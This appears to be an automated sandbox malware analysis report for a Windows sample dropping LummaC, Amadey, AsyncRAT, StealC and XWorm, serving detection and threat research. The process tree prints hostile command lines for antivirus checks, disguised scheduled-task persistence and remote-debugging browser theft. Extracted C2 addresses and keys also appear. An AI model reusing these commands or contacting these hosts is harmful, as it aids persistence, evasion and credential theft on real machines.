Edit tour

Windows Analysis Report
SQ1NgqeTQy.exe

Overview

General Information

Sample name:	SQ1NgqeTQy.exe renamed because original name is a hash value
Original sample name:	dcf95c94c1f8bf06dc0e56d32075ec4b.exe
Analysis ID:	1604553
MD5:	dcf95c94c1f8bf06dc0e56d32075ec4b
SHA1:	ce1e56cc413edc65b0e44f95afa2e86e2cfec20a
SHA256:	5ddd2c06abc94aef41bbc697dd5bb4ca88bd013499067f082abc4a1c975f0796
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC, Amadey, AsyncRAT, KeyLogger, LummaC Stealer, Stealc, StormKitty

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell launch regsvr32

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected AsyncRAT

Yara detected Keylogger Generic

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected StormKitty Stealer

Yara detected Vidar stealer

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Check if machine is in data center or colocation facility

Contains functionality to log keystrokes (.Net Source)

Drops PE files with a suspicious file extension

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: WScript or CScript Dropper

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to resolve many domain names, but no domain seems valid

Tries to steal Crypto Currency Wallets

Uses Register-ScheduledTask to add task schedules

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript called in batch mode (surpress errors)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Entry point lies outside standard sections

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

PE file overlay found

Queries disk information (often used to detect virtual machines)

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SQ1NgqeTQy.exe (PID: 4088 cmdline: "C:\Users\user\Desktop\SQ1NgqeTQy.exe" MD5: DCF95C94C1F8BF06DC0E56D32075EC4B)

VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe (PID: 5008 cmdline: "C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe" MD5: 1D1B67565EF8F1E7BD98824D5FAF1EC6)

78K21CNZITPIMAK88B8Q.exe (PID: 6540 cmdline: "C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe" MD5: 93A9982516A4C1373DD5A2A6130ADE71)

skotes.exe (PID: 6460 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 93A9982516A4C1373DD5A2A6130ADE71)

skotes.exe (PID: 6488 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 93A9982516A4C1373DD5A2A6130ADE71)

skotes.exe (PID: 6600 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 93A9982516A4C1373DD5A2A6130ADE71)

ca3f738a4c.exe (PID: 2300 cmdline: "C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe" MD5: F2432FDB07CAC95C4481843FF0E77FD7)

cmd.exe (PID: 5492 cmdline: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7088 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5264 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 5272 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 4668 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5476 cmdline: cmd /c md 36469 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 3480 cmdline: extrac32 /Y /E Geographic MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 3660 cmdline: findstr /V "TEAMS" Mw MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 1680 cmdline: cmd /c copy /b 36469\Avoiding.com + Hood + Centered + Collectors + Visual + Additionally + Celebration + Flesh + Ventures + Waters 36469\Avoiding.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 2000 cmdline: cmd /c copy /b ..\Characterized + ..\Entries + ..\Arbitration + ..\Put + ..\Comics + ..\Japanese L MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Avoiding.com (PID: 6532 cmdline: Avoiding.com L MD5: 62D09F076E6E0240548C2F837536A46A)

chrome.exe (PID: 612 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3464 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2300,i,15689754464321030936,1754581674988053298,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

choice.exe (PID: 6044 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

f35b37b5a5.exe (PID: 4320 cmdline: "C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe" MD5: 67EBBA5CD77B2452A5EF6A335CC057F9)

21a4f8ff7d.exe (PID: 1632 cmdline: "C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe" MD5: EBE8A0F61F53A3817C3FBCC3AB3A1F4C)

21a4f8ff7d.tmp (PID: 3936 cmdline: "C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp" /SL5="$50458,1104885,161792,C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe" MD5: BCC236A3921E1388596A42B05686FF5E)

21a4f8ff7d.exe (PID: 3772 cmdline: "C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe" /VERYSILENT MD5: EBE8A0F61F53A3817C3FBCC3AB3A1F4C)

21a4f8ff7d.tmp (PID: 6120 cmdline: "C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp" /SL5="$50450,1104885,161792,C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe" /VERYSILENT MD5: BCC236A3921E1388596A42B05686FF5E)

regsvr32.exe (PID: 2820 cmdline: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

regsvr32.exe (PID: 1788 cmdline: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

powershell.exe (PID: 1492 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6360 cmdline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{934473F6-3DB5-419B-8D3A-27C77AD9ADC5}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

94cd0458cc.exe (PID: 4524 cmdline: "C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe" MD5: C3D89E95BFB66F5127AC1F2F3E1BD665)

cmd.exe (PID: 4836 cmdline: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6660 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 2608 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7084 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5604 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3668 cmdline: cmd /c md 764661 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 6052 cmdline: extrac32 /Y /E Fm MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 5780 cmdline: findstr /V "Tunnel" Addresses MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 2316 cmdline: cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 6556 cmdline: cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Macromedia.com (PID: 1124 cmdline: Macromedia.com F MD5: 62D09F076E6E0240548C2F837536A46A)

schtasks.exe (PID: 4696 cmdline: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 4724 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

choice.exe (PID: 4052 cmdline: choice /d y /t 15 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

wscript.exe (PID: 2276 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

AchillesGuard.com (PID: 1252 cmdline: "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r" MD5: 62D09F076E6E0240548C2F837536A46A)

regsvr32.exe (PID: 6676 cmdline: C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

powershell.exe (PID: 6104 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 4828 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, 404KeyLogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.lexfo.fr/StealC_malware_analysis_part1.html https://blog.lexfo.fr/StealC_malware_analysis_part2.html https://blog.lexfo.fr/StealC_malware_analysis_part3.html https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.115/c4becf79229cb002.php"}

Threatname: LummaC

{"C2 url": ["breakfasutwy.cyou", "miniatureyu.lat", "finickypwk.lat", "washyceehsu.lat", "bloodyswif.lat", "leggelatez.lat", "savorraiykj.lat", "shoefeatthe.lat", "kickykiduz.lat"], "Build id": "3sf--"}

Threatname: Xworm

{"C2 url": ["91.212.166.99"], "Port": 4404, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: AsyncRAT

{"External_config_on_Pastebin": "null", "Server": "159.100.19.137", "Ports": "7707", "Version": "0.5.8", "Autorun": "false", "Install_Folder": "svchost.exe", "Install_File": "MTZ4cVRldGczWDFoSHVwbHNqYlc2ZE9GUXRheUlEdnY="}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000002C.00000003.3252145471.0000000004061000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000002C.00000003.3252145471.0000000004061000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x97b7:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xab10:$a2: Stub.exe 0xaba0:$a2: Stub.exe 0x65d5:$a3: get_ActivatePong 0x99cf:$a4: vmware 0x9847:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x7324:$a6: get_SslClient
0000002C.00000003.3252145471.0000000004061000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x9849:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000006.00000002.2341998283.0000000000C21000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002C.00000003.3319737101.0000000001837000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000002C.00000003.3319737101.0000000001837000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xde1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000005.00000002.2330918889.0000000000C21000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002C.00000003.3319485520.0000000004056000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000002C.00000003.3319485520.0000000004056000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x93af:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x147b7:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xa708:$a2: Stub.exe 0xa798:$a2: Stub.exe 0x15b10:$a2: Stub.exe 0x15ba0:$a2: Stub.exe 0x61cd:$a3: get_ActivatePong 0x115d5:$a3: get_ActivatePong 0x95c7:$a4: vmware 0x149cf:$a4: vmware 0x943f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x14847:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x6f1c:$a6: get_SslClient 0x12324:$a6: get_SslClient
0000002C.00000003.3319485520.0000000004056000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x9441:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x14849:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0000002C.00000003.3250710054.0000000003FDB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000002C.00000003.3250710054.0000000003FDB000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x8b0f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x9e68:$a2: Stub.exe 0x9ef8:$a2: Stub.exe 0x592d:$a3: get_ActivatePong 0x8d27:$a4: vmware 0x8b9f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x667c:$a6: get_SslClient
0000002C.00000003.3250710054.0000000003FDB000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x8ba1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x7702:$str01: $VB$Local_Port 0x76f3:$str02: $VB$Local_Host 0x79b1:$str03: get_Jpeg 0x7449:$str04: get_ServicePack 0x8877:$str05: Select * from AntivirusProduct 0x8a75:$str06: PCRestart 0x8a89:$str07: shutdown.exe /f /r /t 0 0x8b3b:$str08: StopReport 0x8b11:$str09: StopDDos 0x8c07:$str10: sendPlugin 0x8da5:$str12: -ExecutionPolicy Bypass -File " 0x8eca:$str13: Content-length: 5235
0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8787:$s6: VirtualBox 0x86e5:$s8: Win32_ComputerSystem 0x9289:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9326:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x943b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8de5:$cnc4: POST / HTTP/1.1
00000000.00000003.2089531197.0000000000F93000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2108324381.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2089531197.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2089889800.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000003.2246624834.0000000004C20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000003.2205394857.0000000005640000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000002C.00000003.3322775695.000000000182E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000002C.00000003.3319485520.000000000407E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
